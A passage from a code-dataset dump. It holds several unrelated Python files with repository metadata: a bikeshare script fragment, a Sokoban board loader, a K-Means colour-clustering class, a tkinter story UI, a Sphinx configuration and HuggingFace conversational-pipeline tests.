    start = 0   # 'next' would shadow the builtin, so use a different name
    while True:
        view_raw_data = input('\nWould you like to view the next five rows of raw data? Enter yes or no.\n')
        if view_raw_data.lower() != 'yes':
            return
        start = start + 5
        print(df.iloc[start:start + 5])
def main():
while True:
city, month, day = get_filters()
df = load_data(city, month, day)
time_stats(df)
station_stats(df)
trip_duration_stats(df)
if city=='ch':
user_stats(df)
while True:
view_raw_data = input('\nWould you like to view first five row of raw data? Enter yes or no.\n')
if view_raw_data.lower() != 'yes':
break
display_raw_data(df)
break
restart = input('\nWould you like to restart? Enter yes or no.\n')
if restart.lower() != 'yes':
break
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
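station_stats above finds the most frequent trip by concatenating the two columns with "||" and splitting later. An equivalent sketch with a pandas groupby (column names as in the bikeshare CSVs) avoids the string round-trip:

top_trip = (df.groupby(['Start Station', 'End Station'])
              .size()
              .idxmax())
print('Most frequent trip: {} -> {}'.format(*top_trip))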
3da20a20d29aa2f522c83f995e511782028cfdd3 | c405becd9f1a66dc3675adb106db01a7aedec840 | /sokoban.py | d327733d2888ea940d0e148d4f9ef6e8913deabd | [] | no_license | ssonkar/Sokoban-Solver | 7897f115497cb05f11d1401c9232f8264daa59f8 | 31a001de38327e5764c941f1e729b888ee988364 | refs/heads/master | 2020-04-10T10:45:09.673727 | 2018-12-08T23:25:36 | 2018-12-08T23:25:36 | 160,974,810 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,781 | py | from board import Board
#from boardastar import Boardastar
import bfs
import ucs
import ass
class Sokoban:
'''
Sokoban game class
'''
def new_board(self, filename):
''' Creates new board from file '''
e = [] # empty solution list
b = Board(e)
with open(filename, 'r') as f: # automatically closes file
read_data = f.read()
lines = read_data.split('\n')
            height = lines.pop(0)  # first line holds the board height; not needed while parsing
x = 0
y = 0
for line in lines:
for char in line:
# adds Spots to board's sets by reading in char
if char == '#':
b.add_wall(x, y)
elif char == '.':
b.add_goal(x, y)
elif char == '@':
b.set_player(x, y)
elif char == '+':
# player gets its own Spot marker
b.set_player(x, y)
b.add_goal(x, y)
elif char == '$':
b.add_box(x, y)
elif char == '*':
b.add_box(x, y)
b.add_goal(x, y)
x += 1
y += 1
x = 0
# check for a board with no player
if hasattr(b, 'player'):
return b
else:
print("No player on board")
return None
def doSearches(self, board, option):
if option == 1:
bfs.search(board)
if option == 2:
ucs.search(board)
if option == 3:
board.isAstar = True
ass.search(board)
| [
"[email protected]"
] | |
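A minimal driver sketch for the Sokoban class above (the level filename is illustrative; the option numbers follow doSearches: 1 = BFS, 2 = UCS, 3 = A*):

game = Sokoban()
board = game.new_board('levels/level1.txt')
if board is not None:
    game.doSearches(board, 1)   # run the BFS solver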
90efc2d698bbd5551213318accc27bd6f924e258 | b7799e8cb21cb2d4c0a526a6f9395a3c620514f9 | /Tagging/KMeans.py | a5225641d480ed11c287e9a13d3760b89448fd5c | [] | no_license | Sivler9/IA_PR2_Color_Tagging | cc664eb2ac24c18612970f0dea5b042d6d9ebe89 | 1148a205c5e2fca32ffbaa832efe4dbb54ecb03a | refs/heads/master | 2020-03-13T07:47:36.215000 | 2018-05-29T20:31:51 | 2018-05-29T20:31:51 | 131,031,661 | 1 | 0 | null | 2018-05-15T07:38:21 | 2018-04-25T16:04:53 | Python | UTF-8 | Python | false | false | 15,838 | py | """
@author: ramon, bojana
"""
import numpy as np
import matplotlib.pyplot as plt
import mpl_toolkits.mplot3d.axes3d as axes3d
from sklearn.decomposition import PCA
from sklearn.metrics.pairwise import euclidean_distances
from sklearn.metrics.pairwise import pairwise_distances_argmin
import sklearn.metrics as metricas
import scipy
import scipy.cluster.vq
import scipy.spatial.distance
from sklearn.cluster import KMeans as camins
def gap(data, nrefs=3, maxClusters=15):
"""
Calculates KMeans optimal K using Gap Statistic from Tibshirani, Walther, Hastie
Params:
data: ndarry of shape (n_samples, n_features)
nrefs: number of sample reference datasets to create
maxClusters: Maximum number of clusters to test for
Returns: (optimalK)
"""
gaps = np.zeros((len(range(1, maxClusters)),))
for gap_index, k in enumerate(range(1, maxClusters)):
# Holder for reference dispersion results
refDisps = np.zeros(nrefs)
# For n references, generate random sample and perform kmeans getting resulting dispersion of each loop
for i in range(nrefs):
# Create new random reference set
randomReference = np.random.random_sample(size=data.shape)
# Fit to it
km = camins(k)
km.fit(randomReference)
refDisp = km.inertia_
refDisps[i] = refDisp
# Fit cluster to original data and create dispersion
km = camins(k)
km.fit(data)
origDisp = km.inertia_
# Calculate gap statistic
gap = np.mean(np.log(refDisps)) - np.log(origDisp)
# Assign this loop's gap statistic to gaps
gaps[gap_index] = gap
return gaps.argmax() + 1 # Plus 1 because index of 0 means 1 cluster is optimal, index 2 = 3 clusters are optimal
def distance(X, C):
"""@brief Calculates the distance between each pixcel and each centroid
@param X numpy array PxD 1st set of data points (usually data points)
@param C numpy array KxD 2nd set of data points (usually cluster centroids points)
@return dist: PxK numpy array position ij is the distance between the
i-th point of the first set an the j-th point of the second set
"""
return euclidean_distances(X,C)
class KMeans():
def __init__(self, X, K, options=None):
"""@brief Constructor of KMeans class
@param X LIST input data
@param K INT number of centroids
        @param options DICT dictionary with options
"""
self._init_X(X) # LIST data coordinates
self._init_options(options) # DICT options
self._init_rest(K) # Initializes de rest of the object
#############################################################
## THIS FUNCTION CAN BE MODIFIED FROM THIS POINT, if needed
#############################################################
def _init_X(self, X):
"""@brief Initialization of all pixels
@param X LIST list of all pixel values. Usually it will be a numpy
array containing an image NxMx3
        sets X as an array of data in vector form (PxD where P=N*M and D=3 in the above example)
"""
if len(X.shape) >= 3:
self.X = X.reshape(-1, X.shape[2]).astype(np.float64)
else:
self.X = np.copy(X.astype(np.float64))
def _init_options(self, options):
"""@brief Initialization of options in case some fields are left undefined
        @param options DICT dictionary with options
        sets the options parameters
"""
if options == None:
options = {}
if not 'km_init' in options:
options['km_init'] = 'first'
if not 'verbose' in options:
options['verbose'] = False
if not 'tolerance' in options:
options['tolerance'] = 0
if not 'max_iter' in options:
options['max_iter'] = np.inf
if not 'fitting' in options:
options['fitting'] = 'Fisher'
self.options = options
#############################################################
## THIS FUNCTION CAN BE MODIFIED FROM THIS POINT, if needed
#############################################################
def _init_rest(self, K):
"""@brief Initialization of the remainig data in the class.
@param options DICT dctionary with options
"""
self.K = K # INT number of clusters
if self.K > 0:
self._init_centroids() # LIST centroids coordinates
self.old_centroids = np.empty_like(self.centroids) # LIST coordinates of centroids from previous iteration
self.clusters = np.zeros(len(self.X)) # LIST list that assignes each element of X into a cluster
self._cluster_points() # sets the first cluster assignation
self.num_iter = 0 # INT current iteration
#############################################################
## THIS FUNCTION CAN BE MODIFIED FROM THIS POINT, if needed
#############################################################
def _init_centroids(self):
"""@brief Initialization of centroids
depends on self.options['km_init']
"""
if self.options['km_init'].lower() == 'first':
unique, index = np.unique(self.X,axis=0, return_index=True)
index = np.sort(index)
self.centroids = np.array(self.X[index[:self.K]])
elif self.options['km_init'].lower() == 'custom':
self.centroids = np.zeros((self.K,self.X.shape[1]))
for k in range(self.K): self.centroids[k,:] = k*255/(self.K-1)
elif self.options['km_init'] == 'kmeans++':
self.centroids = camins(n_clusters=self.K, init='k-means++', n_init=1, max_iter=1).fit(self.X).cluster_centers_
else:
maxtmp = self.X.max(axis=0)
mintmp = self.X.min(axis=0)
centroids = np.zeros((self.X.shape[1],self.K))
for i in range(self.X.shape[1]):
centroids[i] = np.random.uniform(low=mintmp[i],high=maxtmp[i],size=self.K)
self.centroids = np.array(centroids.transpose())
def _cluster_points(self):
"""@brief Calculates the closest centroid of all points in X
"""
self.clusters = pairwise_distances_argmin(self.X, self.centroids)
def _get_centroids(self):
"""@brief Calculates coordinates of centroids based on the coordinates
of all the points assigned to the centroid
"""
self.old_centroids = np.copy(self.centroids)
self.centroids = np.array([self.X[self.clusters == i].mean(0) for i in range(self.K)])
if np.isnan(self.centroids).any():
mask = np.where(np.isnan(self.centroids).all(axis=1))[0]
self.centroids[mask] = self.old_centroids[mask]
def _converges(self):
"""@brief Checks if there is a difference between current and old centroids
"""
return np.allclose(self.centroids, self.old_centroids, self.options['tolerance'])
def _iterate(self, show_first_time=True):
"""@brief One iteration of K-Means algorithm. This method should
            reassign all the points from X to their closest centroids
and based on that, calculate the new position of centroids.
"""
self.num_iter += 1
self._cluster_points()
self._get_centroids()
if self.options['verbose']:
self.plot(show_first_time)
def run(self):
"""@brief Runs K-Means algorithm until it converges or until the number
of iterations is smaller than the maximum number of iterations.=
"""
if self.K == 0:
self.bestK()
return
self._iterate(True)
        self.options['max_iter'] = np.inf  # note: this overrides any user-supplied iteration cap
if self.options['max_iter'] > self.num_iter:
while not self._converges():
self._iterate(False)
def bestK(self):
"""@brief Runs K-Means multiple times to find the best K for the current
data given the 'fitting' method. In cas of Fisher elbow method
is recommended.
at the end, self.centroids and self.clusters contains the
information for the best K. NO need to rerun KMeans.
@return B is the best K found.
"""
#######################################################
## YOU MUST REMOVE THE REST OF THE CODE OF THIS FUNCTION
## AND CHANGE FOR YOUR OWN CODE
#######################################################
centroids = []
clusters = []
bestk = 4
#self.options['fitting'] ='gap'
if self.options['fitting'].lower() == 'jump':
return self.jumpMethod(clusters,centroids)
elif self.options['fitting'].lower() == 'gap':
bestk = gap(self.X, maxClusters=14)
self._init_rest(bestk)
self.run()
return bestk
elif self.options['fitting'].lower() == 'fisher':
bestk, center = -1, []
fit, threshold = np.inf, 2.3
self._init_rest(2)
self.run()
center.append([self.fitting(), self.centroids, self.clusters])
self._init_rest(3)
self.run()
center.append([self.fitting(), self.centroids, self.clusters])
            for k in range(4, 13 + 1):  # range, not the Python-2-only xrange
self._init_rest(k)
self.run()
center.append([self.fitting(), self.centroids, self.clusters])
if (center[-3][0] - center[-2][0]) > (center[-2][0] - center[-1][0])*threshold:
self.centroids, self.clusters = center[-2][1:]
bestk = k - 1
break
else:
bestk = 4
self.centroids, self.clusters = center[bestk-2][1:]
self.K = bestk
return bestk
else:
scores = []
for k in range(2,14):
self._init_rest(k)
self.run()
scores.append(self.fitting())
centroids.append(self.centroids)
clusters.append(self.clusters)
if self.options['fitting'].lower() == 'calinski' or self.options['fitting'].lower() == 'silhouette':
bestk = np.argmax(scores)+2
self.centroids = centroids[bestk-2]
self.clusters = clusters[bestk-2]
self.K = bestk
return bestk
def fitting(self):
"""@brief return a value describing how well the current kmeans fits the data
"""
if self.K == 1:
return 1
elif self.options['fitting'].lower() == 'fisher' and self.K > 1:
return 1/(metricas.calinski_harabaz_score(self.X, self.clusters)*(self.K -1)/(self.X.shape[0]-self.K)) #calinski = (Between_Variance/Whithin_Variance)*(N-k)/(K-1)
elif self.options['fitting'].lower() == 'silhouette':
return metricas.silhouette_score(self.X,self.clusters)
elif self.options['fitting'].lower() == 'calinski':
return metricas.calinski_harabaz_score(self.X, self.clusters)
else:
return np.random.rand(1)
def jumpMethod(self, clusters, centroids):
data = self.X
# dimension of 'data'; data.shape[0] would be size of 'data'
p = data.shape[1]
# vector of variances (1 by p)
#using squared error rather than Mahalanobis distance' (SJ, p. 12)
sigmas = np.var(data, axis=0)
## by following the authors we assume 0 covariance between p variables (SJ, p. 12)
# start with zero-matrix (p by p)
Sigma = np.zeros((p, p), dtype=np.float32)
# fill the main diagonal with variances for
np.fill_diagonal(Sigma, val=sigmas)
# calculate the inversed matrix
Sigma_inv = np.linalg.inv(Sigma)
cluster_range = range(1, 13 + 1)
distortions = np.repeat(0, len(cluster_range) + 1).astype(np.float32)
# for each k in cluster range implement
for k in cluster_range:
# initialize and fit the clusterer giving k in the loop
self._init_rest(k)
self.run()
centroids.append(self.centroids)
clusters.append(self.clusters)
# calculate centers of suggested k clusters
centers = self.centroids
# since we need to calculate the mean of mins create dummy vec
for_mean = np.repeat(0, len(data)).astype(np.float32)
# for each observation (i) in data implement
for i in range(len(data)):
# dummy for vec of distances between i-th obs and k-center
dists = np.repeat(0, k).astype(np.float32)
# for each cluster in KMean clusters implement
for cluster in range(k):
# calculate the within cluster dispersion
tmp = np.transpose(data[i] - centers[cluster])
#using squared error rather than Mahalanobis distance' (SJ, p. 12)
dists[cluster] = tmp.dot(Sigma_inv).dot(tmp)
#dists[cluster] = tmp.dot(tmp)
# take the lowest distance to a class
for_mean[i] = min(dists)
# take the mean for mins for each observation
distortions[k] = np.mean(for_mean) / p
Y = p / 2
# the first (by convention it is 0) and the second elements
jumps = [0] + [distortions[1] ** (-Y) - 0]
jumps += [distortions[k] ** (-Y) \
- distortions[k-1] ** (-Y) \
for k in range(2, len(distortions))]
# calculate recommended number of clusters
bestK = np.argmax(np.array(jumps))
self.centroids = centroids[bestK-1]
self.clusters = clusters[bestK-1]
self.K = bestK
"""plt.figure(2)
plt.cla()
plt.plot(range(16),jumps)
plt.xlabel('K')
plt.ylabel('fitting score')
plt.draw()
plt.pause(20)"""
return bestK
def plot(self, first_time=True):
"""@brief Plots the results
"""
# markersshape = 'ov^<>1234sp*hH+xDd'
markerscolor = 'bgrcmybgrcmybgrcmyk'
if first_time:
plt.gcf().add_subplot(111, projection='3d')
plt.ion()
plt.show()
if self.X.shape[1] > 3:
if not hasattr(self, 'pca'):
self.pca = PCA(n_components=3)
self.pca.fit(self.X)
Xt = self.pca.transform(self.X)
Ct = self.pca.transform(self.centroids)
else:
Xt = self.X
Ct = self.centroids
for k in range(self.K):
plt.gca().plot(Xt[self.clusters == k, 0], Xt[self.clusters == k, 1], Xt[self.clusters == k, 2],
'.' + markerscolor[k])
plt.gca().plot(Ct[k, 0:1], Ct[k, 1:2], Ct[k, 2:3], 'o' + 'k', markersize=12)
if first_time:
plt.xlabel('dim 1')
plt.ylabel('dim 2')
plt.gca().set_zlabel('dim 3')
plt.draw()
plt.pause(0.01)
| [
"[email protected]"
] | |
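A short usage sketch for the KMeans class above (the image array is synthetic; the option keys follow _init_options):

import numpy as np

img = np.random.randint(0, 255, (40, 40, 3))
km = KMeans(img, 3, {'km_init': 'first', 'verbose': False})
km.run()
print(km.centroids.shape)   # (3, 3): K centroids in RGB space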
0d59d8d0b71b7c382e97d7b56015fbfbbafc69d8 | 0227dab8e222d908d02d54ad13ec88b7f1f9ac1f | /AUTOMATAPROYECT-master/Front.py | 2d287391253e9ad5e29a2cb2152e4ae740d4d192 | [] | no_license | OrlandoMR/Automatas | 8c3a3e1fc3f45f6239a24ab2b03a5102b18a1a32 | a1213bf3ca6b7803d0aa82ce52947a86d31e0eca | refs/heads/master | 2021-10-25T10:01:25.564466 | 2019-04-03T19:47:59 | 2019-04-03T19:47:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,548 | py |
from tkinter import *
import os
#Graphical interface
#root widget
root = Tk()
root.title("Titulo de la historia")
root.resizable(False,False)
root.configure(bg="black")
#FirstFrame Creation
myFrame = Frame(root,width=500, height=400)
myFrame.pack()
myFrame.config(width="650", height="350")
myFrame.config(bd= 8,bg = "black")
myFrame.config(relief = "groove")
#LabelFirstText
textLabel = Label(myFrame, text="Hubo una época donde energía era sinónimo de suciedad," +
" encender las luces una importante elección, \nlas ciudades tenían apagones"+
" y los autos quemaban combustible para funcionar..."
, bg = "black", fg = "white", font=("Arial Unicode MS",15))
textLabel.grid(row= 0,column=1, padx=10, pady = 10)
#Image
img = PhotoImage(file='files/fondo.gif')  # Replace with a function that picks the image according to the current state
imageLabel = Label(myFrame, image = img)
imageLabel.grid(row= 1,column=1, padx=10, pady = 10)
#Action Buttons
def actionYesButton():
print("Holaaaaa")
def actionNoButton():
print("AntiHola")
#Buttons
buttonNo = Button(myFrame, text="NO", bg = "black", fg = "green", font = (20),
width = 7, height =5, command = actionNoButton)
buttonNo.grid(row = 2,column = 0, padx = 10, pady = 10)
buttonYes = Button(myFrame, text="YES", bg = "black", fg = "green", font = (20),width = 7,
height =5, command = actionYesButton)
buttonYes.grid(row = 2, column = 3, padx = 10, pady = 10)
root.mainloop()
| [
"[email protected]"
] | |
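A sketch of the image-swap hook that the fondo.gif comment above asks for (state names and file paths are illustrative; a reference to each PhotoImage is kept so tkinter does not garbage-collect it):

images = {}

def show_state(state):
    if state not in images:
        images[state] = PhotoImage(file='files/{}.gif'.format(state))
    imageLabel.config(image=images[state])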
e3ad3b767fbd0d6d7edf4729792f6b837616eec6 | fea389d72e4e458c183ca40ab695d46bc5da5015 | /OMG/source/conf.py | 5fa8d544b7b569b693f643fdf2e2ce745b869795 | [] | no_license | zhangdaoxun/ON-MY-GENE | dfae4f3f135215edb65f79ac6b11f5c7b7405bab | 674819e65894de4ed283649dd9fce66596b73831 | refs/heads/master | 2020-05-02T12:56:12.902829 | 2019-06-06T13:45:16 | 2019-06-06T13:45:16 | 177,971,218 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,225 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'omg'
copyright = '2019, zhangxun'
author = 'zhangxun'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = ''
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'omgdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'omg.tex', 'omg Documentation',
'zhangxun', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'omg', 'omg Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'omg', 'omg Documentation',
author, 'omg', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| [
"[email protected]"
] | |
00c4fad7606971274a79c91af14dc8412935ba2e | c5becab2d4201f2e828d052c22b4496a3bbe4927 | /tests/pipelines/test_pipelines_conversational.py | 9ed32adda652d5983ed5995d8d94a7a0df5d635c | [
"Apache-2.0"
] | permissive | thomwolf/transformers | ba665c456b2acd636d8e3876a87ea446ae0ae092 | 166dfa88e5dfdca1d99197e5006e4e2ea9e49cba | refs/heads/master | 2023-03-08T03:37:13.519336 | 2023-02-15T15:00:01 | 2023-02-15T15:00:01 | 238,908,404 | 4 | 1 | Apache-2.0 | 2023-02-25T16:09:30 | 2020-02-07T11:40:04 | Python | UTF-8 | Python | false | false | 17,110 | py | # Copyright 2020 The HuggingFace Team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from transformers import (
MODEL_FOR_CAUSAL_LM_MAPPING,
MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING,
TF_MODEL_FOR_CAUSAL_LM_MAPPING,
TF_MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING,
AutoModelForCausalLM,
AutoModelForSeq2SeqLM,
AutoTokenizer,
BlenderbotSmallForConditionalGeneration,
BlenderbotSmallTokenizer,
Conversation,
ConversationalPipeline,
TFAutoModelForCausalLM,
pipeline,
)
from transformers.testing_utils import require_tf, require_torch, slow, torch_device
from .test_pipelines_common import ANY, PipelineTestCaseMeta
DEFAULT_DEVICE_NUM = -1 if torch_device == "cpu" else 0
class ConversationalPipelineTests(unittest.TestCase, metaclass=PipelineTestCaseMeta):
model_mapping = dict(
list(MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.items())
if MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING
else [] + list(MODEL_FOR_CAUSAL_LM_MAPPING.items())
if MODEL_FOR_CAUSAL_LM_MAPPING
else []
)
tf_model_mapping = dict(
list(TF_MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING.items())
if TF_MODEL_FOR_SEQ_TO_SEQ_CAUSAL_LM_MAPPING
else [] + list(TF_MODEL_FOR_CAUSAL_LM_MAPPING.items())
if TF_MODEL_FOR_CAUSAL_LM_MAPPING
else []
)
def get_test_pipeline(self, model, tokenizer, processor):
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
return conversation_agent, [Conversation("Hi there!")]
def run_pipeline_test(self, conversation_agent, _):
# Simple
outputs = conversation_agent(Conversation("Hi there!"))
self.assertEqual(outputs, Conversation(past_user_inputs=["Hi there!"], generated_responses=[ANY(str)]))
# Single list
outputs = conversation_agent([Conversation("Hi there!")])
self.assertEqual(outputs, Conversation(past_user_inputs=["Hi there!"], generated_responses=[ANY(str)]))
# Batch
conversation_1 = Conversation("Going to the movies tonight - any suggestions?")
conversation_2 = Conversation("What's the last book you have read?")
self.assertEqual(len(conversation_1.past_user_inputs), 0)
self.assertEqual(len(conversation_2.past_user_inputs), 0)
outputs = conversation_agent([conversation_1, conversation_2])
self.assertEqual(outputs, [conversation_1, conversation_2])
self.assertEqual(
outputs,
[
Conversation(
past_user_inputs=["Going to the movies tonight - any suggestions?"],
generated_responses=[ANY(str)],
),
Conversation(past_user_inputs=["What's the last book you have read?"], generated_responses=[ANY(str)]),
],
)
# One conversation with history
conversation_2.add_user_input("Why do you recommend it?")
outputs = conversation_agent(conversation_2)
self.assertEqual(outputs, conversation_2)
self.assertEqual(
outputs,
Conversation(
past_user_inputs=["What's the last book you have read?", "Why do you recommend it?"],
generated_responses=[ANY(str), ANY(str)],
),
)
with self.assertRaises(ValueError):
conversation_agent("Hi there!")
with self.assertRaises(ValueError):
conversation_agent(Conversation())
# Conversation have been consumed and are not valid anymore
# Inactive conversations passed to the pipeline raise a ValueError
with self.assertRaises(ValueError):
conversation_agent(conversation_2)
@require_torch
@slow
def test_integration_torch_conversation(self):
# When
conversation_agent = pipeline(task="conversational", device=DEFAULT_DEVICE_NUM)
conversation_1 = Conversation("Going to the movies tonight - any suggestions?")
conversation_2 = Conversation("What's the last book you have read?")
# Then
self.assertEqual(len(conversation_1.past_user_inputs), 0)
self.assertEqual(len(conversation_2.past_user_inputs), 0)
# When
result = conversation_agent([conversation_1, conversation_2], do_sample=False, max_length=1000)
# Then
self.assertEqual(result, [conversation_1, conversation_2])
self.assertEqual(len(result[0].past_user_inputs), 1)
self.assertEqual(len(result[1].past_user_inputs), 1)
self.assertEqual(len(result[0].generated_responses), 1)
self.assertEqual(len(result[1].generated_responses), 1)
self.assertEqual(result[0].past_user_inputs[0], "Going to the movies tonight - any suggestions?")
self.assertEqual(result[0].generated_responses[0], "The Big Lebowski")
self.assertEqual(result[1].past_user_inputs[0], "What's the last book you have read?")
self.assertEqual(result[1].generated_responses[0], "The Last Question")
# When
conversation_2.add_user_input("Why do you recommend it?")
result = conversation_agent(conversation_2, do_sample=False, max_length=1000)
# Then
self.assertEqual(result, conversation_2)
self.assertEqual(len(result.past_user_inputs), 2)
self.assertEqual(len(result.generated_responses), 2)
self.assertEqual(result.past_user_inputs[1], "Why do you recommend it?")
self.assertEqual(result.generated_responses[1], "It's a good book.")
@require_torch
@slow
def test_integration_torch_conversation_truncated_history(self):
# When
conversation_agent = pipeline(task="conversational", min_length_for_response=24, device=DEFAULT_DEVICE_NUM)
conversation_1 = Conversation("Going to the movies tonight - any suggestions?")
# Then
self.assertEqual(len(conversation_1.past_user_inputs), 0)
# When
result = conversation_agent(conversation_1, do_sample=False, max_length=36)
# Then
self.assertEqual(result, conversation_1)
self.assertEqual(len(result.past_user_inputs), 1)
self.assertEqual(len(result.generated_responses), 1)
self.assertEqual(result.past_user_inputs[0], "Going to the movies tonight - any suggestions?")
self.assertEqual(result.generated_responses[0], "The Big Lebowski")
# When
conversation_1.add_user_input("Is it an action movie?")
result = conversation_agent(conversation_1, do_sample=False, max_length=36)
# Then
self.assertEqual(result, conversation_1)
self.assertEqual(len(result.past_user_inputs), 2)
self.assertEqual(len(result.generated_responses), 2)
self.assertEqual(result.past_user_inputs[1], "Is it an action movie?")
self.assertEqual(result.generated_responses[1], "It's a comedy.")
@require_torch
def test_small_model_pt(self):
tokenizer = AutoTokenizer.from_pretrained("microsoft/DialoGPT-small")
model = AutoModelForCausalLM.from_pretrained("microsoft/DialoGPT-small")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
conversation = Conversation("hello")
output = conversation_agent(conversation)
self.assertEqual(output, Conversation(past_user_inputs=["hello"], generated_responses=["Hi"]))
@require_tf
def test_small_model_tf(self):
tokenizer = AutoTokenizer.from_pretrained("microsoft/DialoGPT-small")
model = TFAutoModelForCausalLM.from_pretrained("microsoft/DialoGPT-small")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
conversation = Conversation("hello")
output = conversation_agent(conversation)
self.assertEqual(output, Conversation(past_user_inputs=["hello"], generated_responses=["Hi"]))
@require_torch
@slow
def test_integration_torch_conversation_dialogpt_input_ids(self):
tokenizer = AutoTokenizer.from_pretrained("microsoft/DialoGPT-small")
model = AutoModelForCausalLM.from_pretrained("microsoft/DialoGPT-small")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
conversation_1 = Conversation("hello")
inputs = conversation_agent.preprocess(conversation_1)
self.assertEqual(inputs["input_ids"].tolist(), [[31373, 50256]])
conversation_2 = Conversation("how are you ?", past_user_inputs=["hello"], generated_responses=["Hi there!"])
inputs = conversation_agent.preprocess(conversation_2)
self.assertEqual(
inputs["input_ids"].tolist(), [[31373, 50256, 17250, 612, 0, 50256, 4919, 389, 345, 5633, 50256]]
)
@require_torch
@slow
def test_integration_torch_conversation_blenderbot_400M_input_ids(self):
tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot-400M-distill")
model = AutoModelForSeq2SeqLM.from_pretrained("facebook/blenderbot-400M-distill")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
# test1
conversation_1 = Conversation("hello")
inputs = conversation_agent.preprocess(conversation_1)
self.assertEqual(inputs["input_ids"].tolist(), [[1710, 86, 2]])
# test2
conversation_1 = Conversation(
"I like lasagne.",
past_user_inputs=["hello"],
generated_responses=[
" Do you like lasagne? It is a traditional Italian dish consisting of a shepherd's pie."
],
)
inputs = conversation_agent.preprocess(conversation_1)
self.assertEqual(
inputs["input_ids"].tolist(),
[
# This should be compared with the same conversation on ParlAI `safe_interactive` demo.
[
1710, # hello
86,
228, # Double space
228,
946,
304,
398,
6881,
558,
964,
38,
452,
315,
265,
6252,
452,
322,
968,
6884,
3146,
278,
306,
265,
617,
87,
388,
75,
341,
286,
521,
21,
228, # Double space
228,
281, # I like lasagne.
398,
6881,
558,
964,
21,
2, # EOS
],
],
)
@require_torch
@slow
def test_integration_torch_conversation_blenderbot_400M(self):
tokenizer = AutoTokenizer.from_pretrained("facebook/blenderbot-400M-distill")
model = AutoModelForSeq2SeqLM.from_pretrained("facebook/blenderbot-400M-distill")
conversation_agent = ConversationalPipeline(model=model, tokenizer=tokenizer)
conversation_1 = Conversation("hello")
result = conversation_agent(
conversation_1,
)
self.assertEqual(
result.generated_responses[0],
            # ParlAI implementation output; ours differs, but it is our second
